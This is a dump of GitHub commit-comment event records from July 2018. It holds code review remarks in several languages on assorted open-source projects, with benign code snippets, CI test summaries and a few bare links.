{"id":"7925158749","type":"CommitCommentEvent","actor":{"login":"mrdark2001"},"repo":{"name":"Simonddd/troublewarning"},"payload":{"comment":{"id":29612609,"position":null,"line":null,"path":null,"commit_id":"c85366dceecb56f5cbabad3a4da454dc0b35119d","created_at":"2018-07-05T19:34:55Z","updated_at":"2018-07-05T19:34:55Z","author_association":"COLLABORATOR","body":"This is a test"}},"created_at":"2018-07-05T19:34:55Z"}
{"id":"7925158941","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29612610,"position":null,"line":null,"path":null,"commit_id":"da971ce78946c78a48742d2a0905e58cb9e0c304","created_at":"2018-07-05T19:34:58Z","updated_at":"2018-07-05T19:34:58Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-survey-u](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-survey-u).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-survey-u-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-05T19:34:58Z"}
{"id":"7925161511","type":"CommitCommentEvent","actor":{"login":"Pikachu920"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29612613,"position":null,"line":null,"path":null,"commit_id":"e4dc64a34b8f683f455befc9296724ad804b71ec","created_at":"2018-07-05T19:35:33Z","updated_at":"2018-07-05T19:35:33Z","author_association":"MEMBER","body":"which method in specific? you mean CollectionUtils#array? I ended up changing this part of the code entirely because i couldn't find a decent way to format the stream, so it is now this:\r\n```\r\n\t\t\tStringJoiner joiner = new StringJoiner(d);\r\n\t\t\tfor (Object thing : t) {\r\n\t\t\t\tjoiner.add(Classes.toString(thing));\r\n\t\t\t}\r\n\t\t\treturn new String[] { joiner.toString() };\r\n```"}},"created_at":"2018-07-05T19:35:33Z"}
{"id":"7925161754","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29612614,"position":null,"line":null,"path":null,"commit_id":"e858149662f74e29098af7585de233691541abcc","created_at":"2018-07-05T19:35:36Z","updated_at":"2018-07-05T19:35:36Z","author_association":"COLLABORATOR","body":"This code currently breaks here:\r\n```\r\ncode\\Example\\Drasil\\DocumentLanguage\\Definitions.hs:108:69: error:\r\n    • Couldn't match type ‘d’ with ‘QDefinition’\r\n      ‘d’ is a rigid type variable bound by\r\n        the type signature for:\r\n          mkQField :: forall d ctx.\r\n                      (HasUID d, HasShortName d, HasSymbol d, HasAdditionalNotes d,\r\n                       ExprRelat d, HasSymbolTable ctx) =>\r\n                      d -> ctx -> Field -> ModRow -> ModRow\r\n        at Example\\Drasil\\DocumentLanguage\\Definitions.hs:103:13\r\n      Expected type: Control.Lens.Getter.Getting Expr d Expr\r\n        Actual type: (Expr -> Data.Functor.Const.Const Expr Expr)\r\n                     -> QDefinition -> Data.Functor.Const.Const Expr QDefinition\r\n    • In the second argument of ‘(^.)’, namely ‘equat’\r\n      In the second argument of ‘($=)’, namely ‘d ^. equat’\r\n      In the second argument of ‘($)’, namely ‘sy d $= d ^. equat’\r\n    • Relevant bindings include\r\n        d :: d\r\n          (bound at Example\\Drasil\\DocumentLanguage\\Definitions.hs:108:10)\r\n        mkQField :: d -> ctx -> Field -> ModRow -> ModRow\r\n          (bound at Example\\Drasil\\DocumentLanguage\\Definitions.hs:105:1)\r\n```\r\n and I'm not sure why... the passed in `d` that it's saying isn't the right type is supposed to be an instance of class `ExprRelat`, which both `QDefinition` and `DataDefinition` are; so why is it expecting a `QDefinition` explicitly? @szymczdm "}},"created_at":"2018-07-05T19:35:36Z"}
{"id":"7925164753","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"YerkebulanDoroshev/recipe-app"},"payload":{"comment":{"id":29612624,"position":56,"line":56,"path":"src/screens/CreateRecipeScreen.js","commit_id":"03a096894a42817c1591ead9f0504280c73be20d","created_at":"2018-07-05T19:36:18Z","updated_at":"2018-07-05T19:36:18Z","author_association":"NONE","body":"Не используй `this.state` в `setState`.\r\n\r\nИспользуй функциональную форму `setState`:\r\n\r\n```\r\nthis.setState(prevState => ({\r\n  ingredientsArray: [...prevState. ingredientsArray, prevState.ingredient],\r\n  ingredient: ''\r\n});\r\n```"}},"created_at":"2018-07-05T19:36:18Z"}
{"id":"7925165598","type":"CommitCommentEvent","actor":{"login":"adixon"},"repo":{"name":"civicrm/civicrm-core"},"payload":{"comment":{"id":29612625,"position":null,"line":null,"path":null,"commit_id":"91a332284b56766f7f0f89eb2daf408dc9cda502","created_at":"2018-07-05T19:36:29Z","updated_at":"2018-07-05T19:36:29Z","author_association":"CONTRIBUTOR","body":"Thanks for this. I just chased this same bug down to discover you've already fixed it!"}},"created_at":"2018-07-05T19:36:29Z"}
{"id":"7925167473","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"YerkebulanDoroshev/recipe-app"},"payload":{"comment":{"id":29612631,"position":83,"line":83,"path":"src/screens/CreateRecipeScreen.js","commit_id":"03a096894a42817c1591ead9f0504280c73be20d","created_at":"2018-07-05T19:36:56Z","updated_at":"2018-07-05T19:36:56Z","author_association":"NONE","body":"Используй StyleSheet.create вместо inline стилей.\r\n\r\nhttps://stackoverflow.com/a/42511138/2925604"}},"created_at":"2018-07-05T19:36:56Z"}
{"id":"7925171594","type":"CommitCommentEvent","actor":{"login":"siddarajudh"},"repo":{"name":"torvalds/linux"},"payload":{"comment":{"id":29612642,"position":30,"line":30,"path":"Documentation/timers/timekeeping.txt","commit_id":"7806f60e1d205db46eca6ad24429b3f86eda2588","created_at":"2018-07-05T19:37:51Z","updated_at":"2018-07-05T19:37:51Z","author_association":"NONE","body":"I'm sorry. Don't know whether it's the right place/way to ask. I'm new to proposing/submitting changes. \r\nIsn't it (2^n)-1..?"}},"created_at":"2018-07-05T19:37:51Z"}
{"id":"7925171993","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"antretterf/EnergyPlus"},"payload":{"comment":{"id":29612643,"position":null,"line":null,"path":null,"commit_id":"f3da7217b803b6bc1de06c6a9e9884b017ba381c","created_at":"2018-07-05T19:37:57Z","updated_at":"2018-07-05T19:37:57Z","author_association":"NONE","body":"HAMT1_180406 (antretterf) - x86_64-MacOS-10.9-clang: OK (2924 of 2928 tests passed, 10 test warnings)\n\nMessages:\n\n * 6 tests had: EIO diffs.\n * 2 tests had: ESO small diffs.\n * 2 tests had: Table small diffs.\n * 10 tests had: AUD diffs.\n * 4 tests had: ESO big diffs.\n * 4 tests had: Table big diffs.\n * 2 tests had: MTD diffs.\n * 3 tests had: MTR big diffs.\n * 1 test had: ERR diffs.\n * 1 test had: SSZ big diffs.\n * 1 test had: ZSZ big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 621\n * Failed: 4\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3da7217b803b6bc1de06c6a9e9884b017ba381c-PR6715-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3da7217b803b6bc1de06c6a9e9884b017ba381c-PR6715-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.86%25-yellow.png)</a> \n"}},"created_at":"2018-07-05T19:37:57Z"}
{"id":"7925172025","type":"CommitCommentEvent","actor":{"login":"DevJohan"},"repo":{"name":"makerspace/makeradmin"},"payload":{"comment":{"id":29612644,"position":13,"line":59,"path":"webshop/src/static/shop.js","commit_id":"ee85d005c2c1dae40080e5b966763baef731cd9a","created_at":"2018-07-05T19:37:57Z","updated_at":"2018-07-05T19:37:57Z","author_association":"MEMBER","body":"Min tanke är att 'service' permission inte ges till medlemmar och att denna commit därför är onödig. Eventuellt skulle man även kunna ha en 'admin' permission som gav alla nödvändiga permissions."}},"created_at":"2018-07-05T19:37:57Z"}
{"id":"7925172449","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"YerkebulanDoroshev/recipe-app"},"payload":{"comment":{"id":29612646,"position":117,"line":117,"path":"src/screens/CreateRecipeScreen.js","commit_id":"03a096894a42817c1591ead9f0504280c73be20d","created_at":"2018-07-05T19:38:03Z","updated_at":"2018-07-05T19:38:03Z","author_association":"NONE","body":"В React, когда мапишь компоненты, ты должен добавлять обязательный prop `key`.\r\n\r\nhttps://reactjs.org/docs/lists-and-keys.html"}},"created_at":"2018-07-05T19:38:03Z"}
{"id":"7925174095","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"YerkebulanDoroshev/recipe-app"},"payload":{"comment":{"id":29612649,"position":146,"line":146,"path":"src/screens/CreateRecipeScreen.js","commit_id":"03a096894a42817c1591ead9f0504280c73be20d","created_at":"2018-07-05T19:38:25Z","updated_at":"2018-07-05T19:38:25Z","author_association":"NONE","body":"этот `? true : false` здесь не нужен"}},"created_at":"2018-07-05T19:38:25Z"}
{"id":"7925175328","type":"CommitCommentEvent","actor":{"login":"Gargron"},"repo":{"name":"tootsuite/mastodon"},"payload":{"comment":{"id":29612653,"position":31,"line":206,"path":"app/lib/feed_manager.rb","commit_id":"cdb101340a20183a82889f811d9311c370c855e5","created_at":"2018-07-05T19:38:43Z","updated_at":"2018-07-05T19:38:43Z","author_association":"MEMBER","body":"I think you've got a point there"}},"created_at":"2018-07-05T19:38:43Z"}
{"id":"7925178226","type":"CommitCommentEvent","actor":{"login":"bevzuk"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29612662,"position":16,"line":116,"path":"Dodo.Core.UnitTests/DomainModel/Departments/CallCenterPhoneParameterTests.cs","commit_id":"25ad6a6d519e87ac500b2537abd0633741753a8b","created_at":"2018-07-05T19:39:23Z","updated_at":"2018-07-05T19:39:23Z","author_association":"MEMBER","body":"Зачем host выделен в переменную?\r\nЗапутывает, мешает читать тест."}},"created_at":"2018-07-05T19:39:23Z"}
{"id":"7925184192","type":"CommitCommentEvent","actor":{"login":"kazurus"},"repo":{"name":"endpass/endpass-wallet"},"payload":{"comment":{"id":29612678,"position":13,"line":67,"path":"test/unit/specs/components/pages/Send.spec.js","commit_id":"597e2786879f11181871d526db8930083c4d6059","created_at":"2018-07-05T19:40:42Z","updated_at":"2018-07-05T19:40:42Z","author_association":"CONTRIBUTOR","body":"Зачем этот тест удалён? "}},"created_at":"2018-07-05T19:40:42Z"}
{"id":"7925184337","type":"CommitCommentEvent","actor":{"login":"bevzuk"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29612681,"position":45,"line":135,"path":"Dodo.Core.UnitTests/DomainModel/Departments/CallCenterPhoneParameterTests.cs","commit_id":"25ad6a6d519e87ac500b2537abd0633741753a8b","created_at":"2018-07-05T19:40:44Z","updated_at":"2018-07-05T19:40:44Z","author_association":"MEMBER","body":"А вот это, пожалуй, тот редкий случай, когда параметризованный тест мог бы быть уместен. \r\nИли 4 разных теста.\r\nВыбирайте."}},"created_at":"2018-07-05T19:40:44Z"}
{"id":"7925184845","type":"CommitCommentEvent","actor":{"login":"nLight"},"repo":{"name":"di-shykh/RssReader"},"payload":{"comment":{"id":29612683,"position":81,"line":35,"path":"src/store/modules/userSources.js","commit_id":"86381fb4699e302a88af43e00fa9281d942a1a93","created_at":"2018-07-05T19:40:50Z","updated_at":"2018-07-05T19:40:50Z","author_association":"COLLABORATOR","body":"Моя вина, `data` - это не просто массив, это объект Firebase и у него нет метода `map` поэтому только `forEach`"}},"created_at":"2018-07-05T19:40:50Z"}
{"id":"7925185579","type":"CommitCommentEvent","actor":{"login":"bevzuk"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29612686,"position":72,"line":153,"path":"Dodo.Core.UnitTests/DomainModel/Departments/CallCenterPhoneParameterTests.cs","commit_id":"25ad6a6d519e87ac500b2537abd0633741753a8b","created_at":"2018-07-05T19:41:01Z","updated_at":"2018-07-05T19:41:01Z","author_association":"MEMBER","body":"Аналогично"}},"created_at":"2018-07-05T19:41:01Z"}
{"id":"7925194031","type":"CommitCommentEvent","actor":{"login":"will-moore"},"repo":{"name":"ome/training-scripts"},"payload":{"comment":{"id":29612701,"position":20,"line":20,"path":"maintenance/scripts/delete_ROIs.py","commit_id":"9a31c2f9955ad88ce4941e1278e09ea094764a5b","created_at":"2018-07-05T19:42:59Z","updated_at":"2018-07-05T19:42:59Z","author_association":"MEMBER","body":"Ah, yes that makes sense. And it replicates what I was seeing trying to delete Ratings the other day.\r\nI think we just need to wait  ```conn.deleteObjects(\"Roi\", roi_ids, wait=True)```."}},"created_at":"2018-07-05T19:42:59Z"}
{"id":"7925195332","type":"CommitCommentEvent","actor":{"login":"kazurus"},"repo":{"name":"endpass/endpass-wallet"},"payload":{"comment":{"id":29612702,"position":13,"line":67,"path":"test/unit/specs/components/pages/Send.spec.js","commit_id":"597e2786879f11181871d526db8930083c4d6059","created_at":"2018-07-05T19:43:17Z","updated_at":"2018-07-05T19:43:17Z","author_association":"CONTRIBUTOR","body":"Зачем этот тест удалён? "}},"created_at":"2018-07-05T19:43:17Z"}
{"id":"7925195987","type":"CommitCommentEvent","actor":{"login":"Ceridan"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29612705,"position":16,"line":116,"path":"Dodo.Core.UnitTests/DomainModel/Departments/CallCenterPhoneParameterTests.cs","commit_id":"25ad6a6d519e87ac500b2537abd0633741753a8b","created_at":"2018-07-05T19:43:26Z","updated_at":"2018-07-05T19:43:26Z","author_association":"NONE","body":"Идея была в том, чтобы Arrange явно выделить, так как значение host'а тут важно, оно влияет на результат. Мы думали над тем стоит ли его inline'ить или нет и решили оставить так. Но вот твой взгляд со стороны, как внешнего наблюдателя дает понять, что да стоит заинлайнить.\r\n"}},"created_at":"2018-07-05T19:43:26Z"}
{"id":"7925200783","type":"CommitCommentEvent","actor":{"login":"Eystein-Thanisch"},"repo":{"name":"cyocum/irish-gen"},"payload":{"comment":{"id":29612720,"position":null,"line":null,"path":null,"commit_id":"e477681377a195cf0b5bd18299483a6081975029","created_at":"2018-07-05T19:44:34Z","updated_at":"2018-07-05T19:44:34Z","author_association":"COLLABORATOR","body":"From my spot checks, these all look fine. Even if there is the occasional mistake, the net effect will be a massive improvement in quality."}},"created_at":"2018-07-05T19:44:34Z"}
{"id":"7925200952","type":"CommitCommentEvent","actor":{"login":"nLight"},"repo":{"name":"di-shykh/RssReader"},"payload":{"comment":{"id":29612721,"position":63,"line":17,"path":"src/store/modules/userSources.js","commit_id":"86381fb4699e302a88af43e00fa9281d942a1a93","created_at":"2018-07-05T19:44:36Z","updated_at":"2018-07-05T19:44:36Z","author_association":"COLLABORATOR","body":"Переменная `categories` определена сверху, она никогда не перезапишется новым массивом и будет накапливать категории"}},"created_at":"2018-07-05T19:44:36Z"}
{"id":"7925201205","type":"CommitCommentEvent","actor":{"login":"smartcomasi"},"repo":{"name":"smartcomasi/aseancoin-master"},"payload":{"comment":{"id":29612722,"position":36,"line":36,"path":"README.md","commit_id":"fb0c8a4268e6f473c11a45951208c91bdc14e012","created_at":"2018-07-05T19:44:40Z","updated_at":"2018-07-05T19:44:40Z","author_association":"OWNER","body":"https://aseancoinsmartcom.com"}},"created_at":"2018-07-05T19:44:40Z"}
{"id":"7925204466","type":"CommitCommentEvent","actor":{"login":"bevzuk"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29612728,"position":11,"line":132,"path":"Dodo.Tests/UnitLunchParametersShould.cs","commit_id":"e3052f90b435428ecf8be3587def3835155d4b21","created_at":"2018-07-05T19:45:24Z","updated_at":"2018-07-05T19:45:24Z","author_association":"MEMBER","body":"На самом деле это лишнее.\r\nТест проходит с \r\n`            var incompleteXml =\r\n            @\"<qwe>\r\n\t            <Lunch>\r\n\t            </Lunch>\r\n            </qwe>\";\r\n`\r\nи с \r\n`            var incompleteXml =\r\n            @\"<qwe>\r\n          </qwe>\";\r\n`\r\nи даже с \r\n`            var incompleteXml = \"\"; `"}},"created_at":"2018-07-05T19:45:24Z"}
{"id":"7925204602","type":"CommitCommentEvent","actor":{"login":"Ceridan"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29612729,"position":45,"line":135,"path":"Dodo.Core.UnitTests/DomainModel/Departments/CallCenterPhoneParameterTests.cs","commit_id":"25ad6a6d519e87ac500b2537abd0633741753a8b","created_at":"2018-07-05T19:45:26Z","updated_at":"2018-07-05T19:45:26Z","author_association":"NONE","body":"Тут сделал так на основании обсжудения на лекции. Тут логически один Assert на самом деле.  ForAnyHost в конце имени теста как бы явно указывает, что хост нам не важен, и потому мы сделал несколько Assert'ов вместе. Если можно сделать параметризованный, то здесь мне кажется это будет лучшим решением, чем 4 теста, так как читаться будет легче, а смысловая нагрузка у них одна и та же.\r\n"}},"created_at":"2018-07-05T19:45:26Z"}
{"id":"7925204966","type":"CommitCommentEvent","actor":{"login":"isuruf"},"repo":{"name":"regro/cf-scripts"},"payload":{"comment":{"id":29612730,"position":7,"line":74,"path":"conda_forge_tick/auto_tick.xsh","commit_id":"4a2d891598812253e2bd813421fba317acb693ab","created_at":"2018-07-05T19:45:31Z","updated_at":"2018-07-05T19:45:31Z","author_association":"CONTRIBUTOR","body":"Usually these files don't have the feedstock_name prefixed in the recipe. https://github.com/conda-forge/nglview-feedstock/tree/master/recipe"}},"created_at":"2018-07-05T19:45:31Z"}
{"id":"7925207191","type":"CommitCommentEvent","actor":{"login":"tkachpavlo1"},"repo":{"name":"tkachpavlo1/test1"},"payload":{"comment":{"id":29612733,"position":null,"line":null,"path":null,"commit_id":"4fedd20078b4ac4db8e785375d8ed8041b0bd041","created_at":"2018-07-05T19:46:03Z","updated_at":"2018-07-05T19:46:03Z","author_association":"OWNER","body":"yes"}},"created_at":"2018-07-05T19:46:03Z"}
{"id":"7925207548","type":"CommitCommentEvent","actor":{"login":"nLight"},"repo":{"name":"di-shykh/RssReader"},"payload":{"comment":{"id":29612735,"position":79,"line":33,"path":"src/store/modules/userSources.js","commit_id":"86381fb4699e302a88af43e00fa9281d942a1a93","created_at":"2018-07-05T19:46:08Z","updated_at":"2018-07-05T19:46:08Z","author_association":"COLLABORATOR","body":"Когда ты изменяешь что-либо в категории, Firebase посылает событие \"value\" и в этом событии все категории. Ты берешь эти категории и кладешь их в массив `categories`.\r\n\r\nНо штука в том, что в нем все еще лежат старые. Поэтому происходит дублирование."}},"created_at":"2018-07-05T19:46:08Z"}
{"id":"7925208007","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29612736,"position":39,"line":59,"path":"examples_tests/28.Benchmark/main.cpp","commit_id":"bd417b85e3efd7710a5b4bcf18bfec232c7b2e44","created_at":"2018-07-05T19:46:13Z","updated_at":"2018-07-05T19:46:13Z","author_association":"NONE","body":"I have mislead you duue to https://github.com/buildaworldnet/IrrlichtBAW/blob/master/include/IrrCompileConfig.h#L169\r\n\r\nyou will need to make this at least *10 in the instanced case"}},"created_at":"2018-07-05T19:46:13Z"}
{"id":"7925209805","type":"CommitCommentEvent","actor":{"login":"andreasrosdal"},"repo":{"name":"Glue-Software-Engineering-AG/OpenPDF"},"payload":{"comment":{"id":29612743,"position":null,"line":null,"path":null,"commit_id":"be313daae4c6f07901526cef16ccf6b75a5f80ad","created_at":"2018-07-05T19:46:36Z","updated_at":"2018-07-05T19:46:36Z","author_association":"NONE","body":"Is this something which could be of use for other OpenPDF users by being included back to OpenPDF?"}},"created_at":"2018-07-05T19:46:36Z"}
{"id":"7925209885","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29612744,"position":44,"line":64,"path":"examples_tests/28.Benchmark/main.cpp","commit_id":"bd417b85e3efd7710a5b4bcf18bfec232c7b2e44","created_at":"2018-07-05T19:46:37Z","updated_at":"2018-07-05T19:46:37Z","author_association":"NONE","body":"I may have mislead you duue to https://github.com/buildaworldnet/IrrlichtBAW/blob/master/include/IrrCompileConfig.h#L169\r\n\r\nthis can only ever be 1"}},"created_at":"2018-07-05T19:46:37Z"}
{"id":"7925210187","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"aidoha/CookBook"},"payload":{"comment":{"id":29612745,"position":6,"line":6,"path":"App.js","commit_id":"58bcb7d2a7c99115ccbee23d596d946f4384db06","created_at":"2018-07-05T19:46:41Z","updated_at":"2018-07-05T19:46:41Z","author_association":"NONE","body":"Здесь почему-то по 2 пробела везде"}},"created_at":"2018-07-05T19:46:41Z"}
{"id":"7925212460","type":"CommitCommentEvent","actor":{"login":"therealparmesh"},"repo":{"name":"therealparmesh/object-to-formdata"},"payload":{"comment":{"id":29612754,"position":16,"line":57,"path":"index.js","commit_id":"eeac6106dbee960f85e82bb78fa295bb4591e3a1","created_at":"2018-07-05T19:47:12Z","updated_at":"2018-07-05T19:47:12Z","author_association":"OWNER","body":"This is fixed in the latest version!"}},"created_at":"2018-07-05T19:47:12Z"}
{"id":"7925213437","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"aidoha/CookBook"},"payload":{"comment":{"id":29612757,"position":1,"line":1,"path":"components/CreateRecipeForm.js","commit_id":"58bcb7d2a7c99115ccbee23d596d946f4384db06","created_at":"2018-07-05T19:47:23Z","updated_at":"2018-07-05T19:47:23Z","author_association":"NONE","body":"Такие import-ы длинны лучше так писать:\r\n\r\n```\r\nimport {\r\n  ActivityIndicator,\r\n  ScrollView,\r\n  Text,\r\n  TextInput,\r\n  ....\r\n} from 'react-native';\r\n```"}},"created_at":"2018-07-05T19:47:23Z"}
{"id":"7925213986","type":"CommitCommentEvent","actor":{"login":"nLight"},"repo":{"name":"di-shykh/RssReader"},"payload":{"comment":{"id":29612759,"position":68,"line":22,"path":"src/store/modules/userSources.js","commit_id":"86381fb4699e302a88af43e00fa9281d942a1a93","created_at":"2018-07-05T19:47:30Z","updated_at":"2018-07-05T19:47:30Z","author_association":"COLLABORATOR","body":"После того, как ты подписалась на событие - подписка продолжает работать даже после того, как функция `setCategories` выполнилась."}},"created_at":"2018-07-05T19:47:30Z"}
{"id":"7925214948","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"aidoha/CookBook"},"payload":{"comment":{"id":29612761,"position":6,"line":6,"path":"components/CreateRecipeForm.js","commit_id":"58bcb7d2a7c99115ccbee23d596d946f4384db06","created_at":"2018-07-05T19:47:41Z","updated_at":"2018-07-05T19:47:41Z","author_association":"NONE","body":"Этому следует быть в App.js"}},"created_at":"2018-07-05T19:47:41Z"}
{"id":"7925215228","type":"CommitCommentEvent","actor":{"login":"Fraules"},"repo":{"name":"Fraules/psyplants"},"payload":{"comment":{"id":29612762,"position":null,"line":null,"path":null,"commit_id":"093f77087d4e72367dd406d5365b35fd6e783295","created_at":"2018-07-05T19:47:45Z","updated_at":"2018-07-05T19:47:45Z","author_association":"OWNER","body":"www.psyplants.com"}},"created_at":"2018-07-05T19:47:45Z"}
{"id":"7925217445","type":"CommitCommentEvent","actor":{"login":"xneg"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29612770,"position":11,"line":132,"path":"Dodo.Tests/UnitLunchParametersShould.cs","commit_id":"e3052f90b435428ecf8be3587def3835155d4b21","created_at":"2018-07-05T19:48:14Z","updated_at":"2018-07-05T19:48:14Z","author_association":"NONE","body":"Хотел подчеркнуть, что в валидном xml могут быть другие параметры.\r\n\r\n> и даже с\r\n`var incompleteXml = \"\";`\r\n\r\nА вот для этого кейса у нас отдельный тест `ConvertWhitespaceXmlToDefaultUnitLunchParameters`"}},"created_at":"2018-07-05T19:48:14Z"}
{"id":"7925218856","type":"CommitCommentEvent","actor":{"login":"therealparmesh"},"repo":{"name":"benvds/object-to-formdata"},"payload":{"comment":{"id":29612775,"position":10,"line":51,"path":"index.js","commit_id":"59afb70eb9fde3078bc9b49fefcfb2d05757047a","created_at":"2018-07-05T19:48:33Z","updated_at":"2018-07-05T19:48:33Z","author_association":"NONE","body":"Fixed in the latest version."}},"created_at":"2018-07-05T19:48:33Z"}
{"id":"7925221559","type":"CommitCommentEvent","actor":{"login":"sebastian-garofalo"},"repo":{"name":"cgroguez/java-bootcamp"},"payload":{"comment":{"id":29612780,"position":27,"line":27,"path":"src/AbstractFactory/MySQLConnection.java","commit_id":"e91afb01a13b7054dc35ae307ace779d74c86e7f","created_at":"2018-07-05T19:49:11Z","updated_at":"2018-07-05T19:49:11Z","author_association":"NONE","body":"please use curly braces even for single lined blocks"}},"created_at":"2018-07-05T19:49:11Z"}
{"id":"7925222201","type":"CommitCommentEvent","actor":{"login":"nLight"},"repo":{"name":"di-shykh/RssReader"},"payload":{"comment":{"id":29612784,"position":70,"line":24,"path":"src/store/modules/userSources.js","commit_id":"86381fb4699e302a88af43e00fa9281d942a1a93","created_at":"2018-07-05T19:49:19Z","updated_at":"2018-07-05T19:49:19Z","author_association":"COLLABORATOR","body":"Если это переписать так, то будет работать.\r\n```js\r\n      function(data) {\r\n        const categories = [];\r\n        data.forEach(function(data) {\r\n          let cat = {\r\n            key: data.key,\r\n            category: {\r\n              name: data.val().category.name,\r\n              sources: data.val().category.sources\r\n            }\r\n          };\r\n          categories.push(cat);\r\n        });\r\n        state.categories = categories;\r\n      }\r\n```\r\nТеперь мы инициализируем временный массив на каждое событие, а не один раз. Мы потом складываем в него категории в цикле `forEach` и потом его значение присваиваем в `state.categories` перезаписывая то, что там было"}},"created_at":"2018-07-05T19:49:19Z"}
{"id":"7925225528","type":"CommitCommentEvent","actor":{"login":"jonjomckay"},"repo":{"name":"manywho/service-azure"},"payload":{"comment":{"id":29612791,"position":18,"line":50,"path":"src/main/java/com/manywho/services/azure/services/AuthenticationService.java","commit_id":"868e2690a9b0e76dbb40d8ca5788e96c617f01ec","created_at":"2018-07-05T19:50:05Z","updated_at":"2018-07-05T19:50:05Z","author_association":"MEMBER","body":"@josecollazzi I don't think we should do this. Emails are the unique identifier for users in the platform, and user records are created in the Engine for users the service sends back, so we shouldn't be sending arbitrary data back in the `email` field. How can users sometimes have emails and sometimes not?"}},"created_at":"2018-07-05T19:50:05Z"}
{"id":"7925225534","type":"CommitCommentEvent","actor":{"login":"dschade18"},"repo":{"name":"dschade18/hello-world"},"payload":{"comment":{"id":29612792,"position":null,"line":null,"path":null,"commit_id":"57f60a003750a9e8ad986e5d62ed07396db36703","created_at":"2018-07-05T19:50:05Z","updated_at":"2018-07-05T19:50:05Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-05T19:50:05Z"}
{"id":"7925227067","type":"CommitCommentEvent","actor":{"login":"sebastian-garofalo"},"repo":{"name":"cgroguez/java-bootcamp"},"payload":{"comment":{"id":29612795,"position":8,"line":8,"path":"src/AbstractFactory/OracleConnection.java","commit_id":"e91afb01a13b7054dc35ae307ace779d74c86e7f","created_at":"2018-07-05T19:50:25Z","updated_at":"2018-07-05T19:50:25Z","author_association":"NONE","body":"You could also define these values as final, and change their name to all uppercase, for them to become java constants."}},"created_at":"2018-07-05T19:50:25Z"}
{"id":"7925229774","type":"CommitCommentEvent","actor":{"login":"saml1er"},"repo":{"name":"multitheftauto/mtasa-blue"},"payload":{"comment":{"id":29612802,"position":9,"line":50,"path":"Client/game_sa/CAnimBlendStaticAssociationSA.h","commit_id":"c7ed9328915fa47809ab80136ac4ca59a282f2fd","created_at":"2018-07-05T19:51:03Z","updated_at":"2018-07-05T19:51:03Z","author_association":"MEMBER","body":"Sure, I was following the coding guidelines from wiki. Should I update this? https://wiki.multitheftauto.com/wiki/Coding_guidelines"}},"created_at":"2018-07-05T19:51:03Z"}
{"id":"7925229833","type":"CommitCommentEvent","actor":{"login":"sebastian-garofalo"},"repo":{"name":"cgroguez/java-bootcamp"},"payload":{"comment":{"id":29612803,"position":11,"line":11,"path":"src/Builder/ConnDirector.java","commit_id":"e91afb01a13b7054dc35ae307ace779d74c86e7f","created_at":"2018-07-05T19:51:04Z","updated_at":"2018-07-05T19:51:04Z","author_association":"NONE","body":"please review the builder pattern doc I shared on slack"}},"created_at":"2018-07-05T19:51:04Z"}
{"id":"7925233803","type":"CommitCommentEvent","actor":{"login":"dedChar"},"repo":{"name":"Shroompow/DedShroom"},"payload":{"comment":{"id":29612814,"position":null,"line":null,"path":null,"commit_id":"29bca17b021c2b2d4c1bfa9cb67412e593cb9cc6","created_at":"2018-07-05T19:52:01Z","updated_at":"2018-07-05T19:52:01Z","author_association":"COLLABORATOR","body":"damn so much pre-organization"}},"created_at":"2018-07-05T19:52:01Z"}
{"id":"7925236126","type":"CommitCommentEvent","actor":{"login":"Blueyescat"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29612830,"position":null,"line":null,"path":null,"commit_id":"e4dc64a34b8f683f455befc9296724ad804b71ec","created_at":"2018-07-05T19:52:34Z","updated_at":"2018-07-05T19:52:34Z","author_association":"CONTRIBUTOR","body":"yeah `return CollectionUtils.array(joiner.toString());`"}},"created_at":"2018-07-05T19:52:34Z"}
